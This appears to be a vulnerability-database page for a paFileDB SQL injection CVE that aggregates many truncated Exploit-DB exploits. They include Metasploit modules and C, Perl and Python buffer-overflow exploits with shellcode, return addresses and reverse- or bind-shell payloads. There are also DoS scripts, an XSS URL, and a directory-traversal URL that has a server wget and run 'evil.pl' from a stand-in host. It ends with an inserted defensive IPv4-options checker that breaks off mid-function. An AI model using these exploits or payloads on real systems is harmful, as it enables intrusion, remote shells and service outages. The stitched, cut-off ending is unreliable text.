CVE-2005-2000
Published: 2005-06-15
Priority: P3 · 40 · high · CVSS 2.0: 7.5 · Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.44% (82.3rd percentile)
Multiple SQL injection vulnerabilities in paFileDB 3.1 and earlier allow remote attackers to execute arbitrary SQL commands via the formname parameter (1) in the login form, (2) in the team login form, or (3) to auth.php, (4) select, (5) id, or (6) query parameter to pafiledb.php, or (7) string parameter to search.php.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
GHSA · ghsa_unreviewed · 2022-05-01 · CVE-2005-2000 [HIGH]
GHSA-jpcx-2gp7-wqj7: Multiple SQL injection vulnerabilities in paFileDB 3
GHSA · ghsa_unreviewed · 2022-05-01 · CVSS 7.5 · CVE-2007-3808 [HIGH]
GHSA-vr29-hp79-9fjh: SQL injection vulnerability in includes/search
SQL injection vulnerability in includes/search.php in paFileDB 3.6 allows remote attackers to execute arbitrary SQL commands via the categories[] parameter in a search action to index.php, a different vector than CVE-2005-2000.
No detection rules found.
Exploit-DB · 2011-02-08 · CVE-2008-5416
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Window
Exploit-DB · 2011-01-24 · CVE-2008-5416
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin.rb 11631 2011-01-24 19:37:58Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop
Exploit-DB · 2010-08-30 · CVE-2005-1983
Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
---
##
# $Id: ms05_039_pnp.rb 10190 2010-08-30 20:40:05Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Plug and Play Service Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Windows Plug
and Play service. This vulnerability can be exploited on
Windows 2000 without a valid user account.
NOTE: Since the PnP service runs inside the service.exe process, a failed
exploit attempt will cause the system to automatically reboot.
Exploit-DB · 2010-06-15 · CVE-2005-4411
Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)
---
Mercury/32 'Mercury/32 %q{
This module exploits a stack-based buffer overflow in
Mercury/32 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9525 $',
'References' =>
[
[ 'CVE', '2005-4411' ],
[ 'OSVDB', '22103'],
[ 'BID', '16396' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
[ 'Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ],
],
'Privileged' => true,
'DisclosureDate' => 'Dec 19 2005',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(105)], self)
end
def exploit
connect
print_status("Trying target #{target.name}...")
sploit = rand_text_alphanumeric(224, payload_badc
Exploit-DB · 2010-05-09 · CVE-2005-1812
FutureSoft TFTP Server 2000 - Transfer-Mode Overflow (Metasploit)
---
##
# $Id: futuresoft_transfermode.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'FutureSoft TFTP Server 2000 Transfer-Mode Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the FutureSoft TFTP Server
2000 product. By sending an overly long transfer-mode string, we were able
to overwrite both the SEH and the saved EIP. A subsequent write-exception
that will occur allows the transferring of execution to our
Exploit-DB · 2008-06-03 · CVE-2008-6678
QuickerSite 1.8.5 - Multiple Vulnerabilities
---
########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: QuickerSite Multiple Vulnerabilities
# Vendor: www.quickersite.com
# Vulnerable Version: 1.8.5
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/39
###################################################################################
####################
1. Description:
####################
QuickerSite is a Content Management System for Windows Servers. It is written in ASP/VBScript with an optional pinch of ASP.NET for true image-resizing capabilities. QuickerSite ships with an Access database, with the option to upsize to SQL Server 2000/2005 for busy sites (>1
Exploit-DB · 2008-05-12 · CVE-2008-5215
ClanLite 2.x - SQL Injection / Cross-Site Scripting
---
########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ##############################
ClanLite V2 SQL inj. & XSS
dork: Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005
dork: Themed By Ray © 2003, 2004 iOptional
readme script
/****************************************************************************
* File : *
* Copyright : (C) 2004 ClanLite V2 *
* Email : [email protected] *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
******************************************************************
Exploit-DB · 2007-04-01 · CVE-2005-1255
IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Ipswitch IMAIL Server IMAPD 7.13 - 8.20 exploit
* Site : http://www.ipswitch.com
* Found by : iDEFENSE Security (http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=243)
* ----------------------------------------
* Exploit date : 31.03.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows 2000 SP4 and Windows XP ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info: Well, this is the realization of the IMAIL IMAPd 'LOGIN' buffer overflow vulnerability.
* The version provided by kcope uses SEH overwrite method, which doesn't work on Windows XP SP2,
* so i have written the exploit that overwrites EI
Exploit-DB · 2007-03-21 · CVE-2007-1579
Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
---
#!/usr/bin/python
# Remote exploit for the stack overflow vulnerability in Mercur Messaging 2005
# SP3 IMAP service. The exploit was tested on windows 2000 server SP4 in a
# Vmware environment. At the time of overflow EBX points to our shellcode.
# However this buffer into which EBX points will give a maximum of 224 bytes of
# uninterrupted space for shellcode. So for my analysis is settled for a useradd
# shellcode which comes to 224 bytes :-). However looking at it a little bit
# further i found that you can send SUBSCRIBE request just before the actual
# command that causes the overflow and you have a shellcode space of 520 bytes
# further down the stack. So you can club the 224 bytes you get at overflow t
Exploit-DB · 2006-06-14 · CVE-2006-2374
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030)
---
///////////////////////////////////////////////////////////////////////////////////////
// Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005)
// Tested on XP SP2 && 2K SP4
// Disable ReadOnly Memory protection
// HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0
// -----------------------------------------------------------------------------------
// ONLY FOR EDUCATIONAL PURPOSES.
// -----------------------------------------------------------------------------------
// Rubén Santamarta.
// www.reversemode.com
// -----------------------------------------------------------------------------------
// OVERVIEW
// -------------------------------------------------------
Exploit-DB · 2006-01-16 · CVE-2005-3116
Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow
---
/*
DESCRIPTION
Veritas NetBackup Stack Overflow (tcp/13701)
"Volume Manager Daemon" Module
Advisories
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336
http://www.frsirt.com/english/advisories/2005/2349
USAGE
C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0
Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
Sending first buffer.
Sending second buffer.
C:\NetBackup>nc 192.168.0.200 4444
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
INFORMATION
I wrote this just for educational purposes :).
Because the buffer is only very small, I had to write small shellcode.
The code is less than 100 bytes, and there are 6 bytes left.
Exploit-DB · 2006-01-05 · CVE-2005-2827
Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation (MS05-055)
---
/* helper.c commented out below ms05-055.c /str0ke */
/*
MS05-055 Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability Exploit
Created by SoBeIt
12.25.2005
Main file of exploit
Tested on:
Windows 2000 PRO SP4 Chinese
Windows 2000 PRO SP4 Rollup 1 Chinese
Windows 2000 PRO SP4 English
Windows 2000 PRO SP4 Rollup 1 English
Usage:ms05-055.exe helper.exe
*/
#include
#include
#include
#include
#define NTSTATUS ULONG
#define ProcessBasicInformation 0
typedef VOID (NTAPI *PKNORMAL_ROUTINE)(PVOID ApcContext, PVOID Argument1, PVOID Argument2);
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _PROCESS_B
Exploit-DB · 2005-12-15 · CVE-2005-4270
Watchfire AppScan QA 5.0.x - Remote Code Execution
---
# Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC
#
# How to use:
# 1. Run this script to setup the fake web server.
# 2. Scan the server with AppScan QA, either in Interactive or Manual mode.
# 3. If you get a "You are vulnerable!" popup, you should upgrade immediately.
#
# PoC developed for Windows 2000 Server SP4.
#
#!/usr/bin/perl -w
use IO::Socket::INET;
# Disable buffering
$| = 1;
# Define 200 OK Responses
my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=ISO-8859-1\r\n\r\nadmin";
# Define the 401 Auth Required Header and Tail
my $r
Exploit-DB · 2005-12-08 · CVE-2005-4131
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
---
source: https://www.securityfocus.com/bid/15780/info
Microsoft Excel is susceptible to a remote code-execution vulnerability. This issue was originally disclosed through an eBay auction that has since been terminated.
This issue is due to the application's failure to properly bounds-check user-supplied input data in the 'Named Range' definition in Excel data files. This results in the corruption of critical memory sections, allowing code execution.
The following is a proof-of-concept example segment of an Excel data file. The '*' characters represent the location of the affected value that triggers this issue. Setting these locations to '0xFF' will crash the application.
00000720 00 80 00 ff 93 02 04 00
Exploit-DB · 2005-12-01 · CVE-2005-3981
Microsoft Windows XP/2000/2003 - CreateRemoteThread Local Denial of Service
---
// source: https://www.securityfocus.com/bid/15671/info
Microsoft Windows is prone to a local denial of service vulnerability. This issue can allow an attacker to trigger a system wide denial of service condition or terminate arbitrary processes.
Reports indicate that a process can call the 'CreateRemoteThread' function to trigger this issue.
It was reported that this attack can be carried out by a local unprivileged user.
#include
#include
#include
BOOL exploit(char* chProcessName)
{
HANDLE hProcessSnap = NULL;
HANDLE hProcess = NULL;
BOOL bFound = FALSE;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = {0};
UINT uExitCode = 0;
DWORD dwExitCode = 0;
LPDWORD lpExitCode = &dwExitCode;
hProcessSnap = Cre
Exploit-DB · 2005-11-30 · CVE-2005-2124
Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
---
/*
* Author: Winny Thomas
* Pune, INDIA
*
* The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
* when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
* The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed.
*
* Disclaimer: This code is for educational/testing purposes by authorized persons on
* networks/systems setup for such a purpose. The author of this code shall not bear
* any responsibility for any damage caused by using this code.
*
*/
#include
unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00" //mt
Exploit-DB · 2005-11-29 · CVE-2005-2124
Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)
---
/*
* Author: Winny Thomas
* Pune, INDIA
*
* The crafted metafile from this code when viewed in internet explorer raises the CPU utilization
* to 100%. The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed
*
* Disclaimer: This code is for educational/testing purposes by authorized persons on
* networks/systems setup for such a purpose. The author of this code shall not bear
* any responsibility for any damage caused by using this code.
*
*/
#include
unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00"
"\x09\x00"
"\x00\x03"
"\xff\xff\xff\xff" //Metafile file size
"\x04\x00
Exploit-DB · 2005-11-27 · CVE-2005-2119
Microsoft Windows - MSDTC Service Remote Memory Modification (PoC) (MS05-051)
---
/*
\ MSDTC remote PoC exploit
/ by Darkeagle
\
/
\ Unl0ck Research Team
/
\
/ Greetingz: all UKT boys, 0x557 guys, Sowhat, GHC/RST guys
\
/ Exploit tested on: Windows 2000 Professional Russian Service Pack 4
\
/ http://exploiterz.org || http://55k7.org
\
/ Reference: http://security.nnov.ru/Jdocument906.html
\
/ ."by default on all Windows 2000 systems."
\ that's false: by default on my system the msdtc service is turned off.
*/
#include
#include
#include
#include
unsigned char packet1[] =
"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00"
"\x00\x00\x01\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x01\x00\xe0\x0c\x6b\x90\x0b\xc7\x67\x10\xb3\x17"
"\x00\xdd\x01\x06\x62\xda\x01\x00\x00\x00\x04\x5d\x
Exploit-DB · 2005-11-16 · CVE-2005-3644
Microsoft Windows Server 2000 - UPNP 'getdevicelist' Memory Leak Denial of Service
---
/*
* Author: Winny Thomas
* Nevis Labs, Pune, INDIA
*
* Details:
* While working on the exploit for MS05-047 i came across a condition where
* a specially crafted request to upnp_getdevicelist would cause
* services.exe to consume memory to a point where the target machine's virtual
* memory gets exhausted. This exploit is NOT similar to the MS05-047 exploit i
* published earlier. The earlier one trashed the EIP of the target causing a
* crash in services.exe and eventually brought down the system to shut down.
* However in this exploit (again a DOS) the virtual memory is consumed to a
* point where desktop requests (like clicking "My Computer"), HTTP requests,
* SMB requests etc does not get serviced f
Exploit-DB · 2005-10-31 · CVE-2005-3411
Snitz Forum 2000 - 'post.asp' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/15241/info
Snitz Forum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=General+chat&type=">alert("PWND")
Exploit-DB · 2005-10-11 · CVE-2005-1979
Microsoft Windows XP/2000/2003 - MSDTC TIP Denial of Service (MS05-051)
---
source: https://www.securityfocus.com/bid/15058/info
The Microsoft Windows MSDTC (Microsoft Distribution Transaction Coordinator) service is prone to a denial of service vulnerability.
The vulnerability exists in the TIP (Transaction Internet Protocol) functionality that is provided by MSDTC. This vulnerability may be exploited by a remote attacker to deny the availability of services that depend on MSDTC.
This issue only exists on operating systems that have support for the TIP protocol enabled. This vulnerability is remotely exploitable on default configurations on Windows 2000. TIP is not enabled by default on Windows XP and Windows Server 2003 even if the MSDTC service is running.
Update: Microsoft report
Exploit-DB · 2005-08-12 · CVE-2005-1983
Microsoft Windows Plug-and-Play Service - Remote Universal (MS05-039)
---
/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
*
* Copyright (c) 2005 houseofdabus.
*
* (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
* Universal Exploit + no crash shellcode
*
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution and local elevation of privilege
* vulnerability exists in Plug and Play that could allow an
* attacker who successfully exploited this vulnerability to take
* complete control of the affected system.
*
* This is a remote code execution and local privilege elevation
* vulnerability. On Windows 2000, an anonymous attacker could
* remotely try to exploit this vulnerabili
Exploit-DB · 2005-08-11 · CVE-2005-1983
Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)
---
/*
Windows 2000 universal exploit for MS05-039
-\x6d\x35\x6c\x30\x6e\x6e\x79-
*/
#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#include
#include
#include
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
BYTE Data1[0x68] =
Exploit-DB · 2005-07-12 · CVE-2005-2242
Cisco CallManager 1.0/2.0/3.x/4.0 - CTI Manager Remote Denial of Service
---
source: https://www.securityfocus.com/bid/14251/info
The CallManager CTI Manager service is susceptible to a remote denial of service vulnerability.
This issue is documented in Cisco bug CSCee00116, which is available to Cisco customers.
This issue may be exploited to cause the affected application to restart, denying service to legitimate users.
This issue was originally documented in BID 14227.
wget http://www.example.com:2000
Exploit-DB · 2005-07-05 · CVE-2005-2087
Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Overflow
---
# Bindshell on port 28876 - Based on Berend-Jan Wever's IE exploit
# 01 July 2005
#
# Description - http://www.frsirt.com/english/advisories/2005/0935
# Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx
# sec-consult - http://www.sec-consult.com/184.html
#
# Solution :
# Set Internet and Local intranet security zone settings to "High" or use
# another browser until a patch is released.
#
# Tested on :
# Internet Explorer 6 on Microsoft Windows XP SP2
# Internet Explorer 6 on Microsoft Windows XP SP1
#
# Affected versions :
# Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4
# I
Exploit-DB · 2005-06-29 · CVE-2005-0059
Microsoft Windows Message Queuing - Remote Buffer Overflow Universal (MS05-017) (v.0.3)
---
/* HOD-ms05017-msmq-expl.c: 2005-06-28: PUBLIC v.0.3
*
* Copyright (c) 2004-2005 houseofdabus.
*
* (MS05-017) Message Queuing Buffer Overflow Vulnerability
* Universal Exploit
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* [ http://www.livejournal.com/users/houseofdabus
* ---------------------------------------------------------------------
* Systems Affected:
* - Windows XP SP1
* - Windows 2000 SP4
* - Windows 2000 SP3
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution vulnerability exists in Message Queuing
* that could allow an attacker who successfully exploited this
* vulnerability to take complete control of the affected system.
*
* ---
Exploit-DB · 2005-06-15 · CVE-2005-2000
PHP Arena 1.1.3 - 'pafiledb.php' Remote Change Password
---
#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m #
######################################################################################
# EXPLOIT FOR: PHP Arena paFileDB 1.1.3 And 0lder #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v) #
#Email: [email protected] #
# #
# #
# + Discovered By: GulfTech #
# + Advisory: https://www.securityfocus.com/bid/13967 #
#Vulnerable: PHP Arena paFileDB 1.1.3 and Older #
######################################################################################
# GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- Dr_CephaleX -- Str0ke #
#And Iranian Security & Hackin
Exploit-DB · 2005-06-07 · CVE-2005-1931
GoodTech SMTP Server 5.14 - Denial of Service
---
#===== Start GoodTechSMTPServer_DOS.pl =====
#
# Usage: GoodTechSMTPServer_DOS.pl
# GoodTechSMTPServer_DOS.pl 127.0.0.1
#
# GoodTech SMTP Server for Windows NT/2000/XP version 5.14
#
# Download:
# http://www.goodtechsys.com/
#
##########################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => "TCP"))
{
print "Attempting to kill GoodTech SMTP Server at $ARGV[0]:25...";
sleep(1);
print $socket "HELO moto.com\r\n";
sleep(1);
print $socket "RCPT TO: A\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:25\n";
}
#===== End GoodTechSMTPServer_DOS.pl =====
# milw0rm.com [2005-06-07]
Exploit-DB · 2005-06-02 · CVE-2005-1812
FutureSoft TFTP Server 2000 - Remote Denial of Service
---
/*
*
* FutureSoft TFTP Server 2000 Remote Denial of Service Exploit
* http://www.futuresoft.com/products/lit-tftp2000.htm
* Bug Discovered by SIG^2 (http://www.security.org.sg)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: [email protected]
* Credit to kozan
* Usage:tftp_exp [targetPort]
*
*/
/*
*
* Vulnerable Versions:
* TFTP Server 2000 Evaluation Version 1.0.0.1
*
*/
#include
#include
#pragma comment(lib, "ws2_32.lib")
/* |RRQ|AAAAAAAAAAAAAAAA....|NULL|netasc|NULL| */
char expbuffer[] =
"\x00\x01"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x4
Exploit-DB · 2005-05-16 · CVE-2005-1365
pserv 3.2 - Directory Traversal
---
source: https://www.securityfocus.com/bid/13642/info
pServ is prone to a directory traversal vulnerability. This occurs because the application does not implement a proper method for filtering directory traversal sequences from URIs. Since this can be done from the cgi-bin directory, it is possible to execute commands to which the Web server has permission.
This issue was reported to affect pServ version 3.2; earlier versions are likely vulnerable.
The following url downloads a script (or executable) to the server:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl
This is how the script can be executed afterwards:
http://www.example.com:2000/cgi-bin///////////../../../../..
Exploit-DB · 2005-05-01 · CVE-2005-1415
GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow
---
#!/usr/bin/python
###############################################
# GlobalScape Secure FTP Server Buffer Overflow
# Coded by [email protected]
# http://www.see-security.com
# http://www.hackingdefined.com/exploits/Globalscape30.pdf
###############################################
# EIP Overwrite
# root@[muts]# ./globalscape-3.0-ftp.py
#
# [+] Evil GlobalFTP 3.0 Secure Server Exploit
# [+] Coded by mati [at] see-security [dot] com
# [+] 220 GlobalSCAPE Secure FTP Server (v. 3.0) * UNREGISTERED COPY *
#
# [+] Sending Username
# [+] Sending Password
# [+] Sending evil buffer
# [+] Connect to port 4444 on victim Machine!
#
# root@[muts]# nc -v 192.168.1.153 4444
# [192.168.1.153] 4444 (?) open
# Microsoft Windows 2000 [Version
Exploit-DB · 2005-04-22 · CVE-2005-0944
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
---
##################################################################
# #
# Microsoft Jet (msjet40.dll) Reverse Shell Exploit #
# #
# #
# #
# #
# Based on the exploit written by S.Pearson and #
# Python version by coded by Tal zeltzer #
# #
# XP/sp2 fixed version by Jean Luc #
# #
##################################################################
import sys
import struct
# Addresses are compatible with Windows XP Service Pack 1 and Service Pack 2
# EIP = "\x47\xAD\x05\x30"; # Use this one for MSAccess 2003 (jmp edx)
EIP = "\xF7\x69\x05\x30"; # Use this one MSAccess 2002 (jmp edx)
# EIP = "\xFf\xf7\x07\x30"; # Use this one MSAccess 2000 (jmp edx)
# Reverse Connect Shellcode (From metasploit)
Shellcode_p1 = "\x3
Exploit-DB
Microsoft Windows 98/2000 Explorer - Preview Pane Script Injection
exploitdb·2005-04-19
CVE-2005-1191 Microsoft Windows 98/2000 Explorer - Preview Pane Script Injection
Microsoft Windows 98/2000 Explorer - Preview Pane Script Injection
---
source: https://www.securityfocus.com/bid/13248/info
Microsoft Windows Explorer is prone to a script injection vulnerability. This occurs when the Windows Explorer preview pane (Web View) is enabled on Windows 2000 computers. Windows 98/98SE/ME are also affected by this issue. If a file with malicious attributes is selected using Explorer, script code contained in the attribute fields may be executed with the privilege level of the user that invoked Explorer. This could be exploited to gain unauthorized access to the vulnerable computer in the context of the currently logged in user.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25454-1.doc
https://gitlab.com/exploit-database/expl
Exploit-DB
Microsoft Exchange Server - Remote Code Execution (MS05-021)
exploitdb·2005-04-19
CVE-2005-0560 Microsoft Exchange Server - Remote Code Execution (MS05-021)
Microsoft Exchange Server - Remote Code Execution (MS05-021)
---
#!/bin/perl
#
#
# MS05-021 Exchange X-LINK2STATE Heap Overflow
# Author: Evgeny Pinchuk
# For educational purposes only.
#
# Tested on:
# Windows 2000 Server SP4 EN
# Microsoft Exchange 2000 SP3
#
# Thanks and greets:
# Halvar Flake (thx for the right directions)
# Alex Behar, Yuri Gushin, Ishay Sommer, Ziv Gadot and Dave Hawkins
#
#
use IO::Socket::INET;
my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
my $EAX="\x55\xB2\xD3\x77"; # CALL DWORD PTR [ESI+0x4C] (rpcrt4.dll)
my $ECX="\xF0\xA1\x5C\x7C"; # lpTopLevelExceptionFilter
my $JMP="\xEB\x10";
my $SC="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\xD5\x01" .
"\x59\x7C\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x5F" .
"\x0C\x59
Exploit-DB
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)
exploitdb·2005-04-16
CVE-2005-0048 Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)
---
// source: https://www.securityfocus.com/bid/13116/info
Microsoft Windows is reported prone to a remote code execution vulnerability. It is reported that the vulnerability manifests when an affected Microsoft platform receives and processes an especially malformed TCP/IP packet.
Reports indicate that the immediate consequences of exploitation of this issue are a denial of service.
/* ecl-winipdos.c - 16/04/05
* Yuri Gushin
* Alex Behar
*
* This one was actually interesting, an off-by-one by our beloved
* M$ :)
*
* When processing an IP packet with an option size (2nd byte after
* the option) of 39, it will crash - since the maximum available
* size is 40 for the whole IP options field, and two are a
Exploit-DB
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)
exploitdb·2005-04-12
CVE-2005-0048 Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)
---
source: https://www.securityfocus.com/bid/13116/info
Microsoft Windows is reported prone to a remote code execution vulnerability. It is reported that the vulnerability manifests when an affected Microsoft platform receives and processes an especially malformed TCP/IP packet.
Reports indicate that the immediate consequences of exploitation of this issue are a denial of service.
#!/usr/bin/perl
use strict;
use warnings;
my %opts;
use Getopt::Std;
getopts('t:p:', \%opts);
die("Usage: $0 -t TARGET -p PORT\n") unless $opts{t} && $opts{p};
use Net::Pkt;
$Env->debug(3);
my $frame = Net::Packet::Frame->new(
l3 => Net::Packet::IPv4->new(
dst => $opts{t},
options => "\x03\x27". 'G'x38,
),
l4 => Net::Pack
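Both entries above for CVE-2005-0048 describe the same packet: a 40-byte IPv4 options field carrying one option of type 3 with a declared length of 0x27 (39), padded with filler. As an added example, not the authors' code and not a statement about where the Windows stack fails, here is an options walker that bounds every read by the bytes actually present rather than by what an option declares, run over a copy of that options field. The function names and the 60-byte header built around the options are constructed for the demonstration.

```python
import struct

IPV4_OPTIONS_MAX = 40          # RFC 791: IHL max 15 words = 60 bytes, 20 of them fixed
EOL, NOP = 0x00, 0x01          # one-byte options with no length field
ROUTE_OPTIONS = {3: "LSRR", 7: "RR", 9: "SSRR"}   # option numbers (type & 0x1f)


def check_ipv4_options(opts: bytes) -> list:
    """Walk an IPv4 options field and return the malformations found
    (empty list = well-formed). No index ever exceeds len(opts)."""
    issues = []
    n = len(opts)
    if n > IPV4_OPTIONS_MAX:
        return [f"options field is {n} bytes, maximum is {IPV4_OPTIONS_MAX}"]
    i = 0
    while i < n:
        t = opts[i]
        if t == EOL:
            break
        if t == NOP:
            i += 1
            continue
        if i + 1 >= n:
            issues.append(f"option 0x{t:02x} at offset {i}: length byte missing")
            break
        ln = opts[i + 1]
        if ln < 2:
            issues.append(f"option 0x{t:02x} at offset {i}: length {ln} < 2")
            break
        if i + ln > n:
            issues.append(f"option 0x{t:02x} at offset {i}: declared length {ln} "
                          f"but only {n - i} bytes remain")
            break
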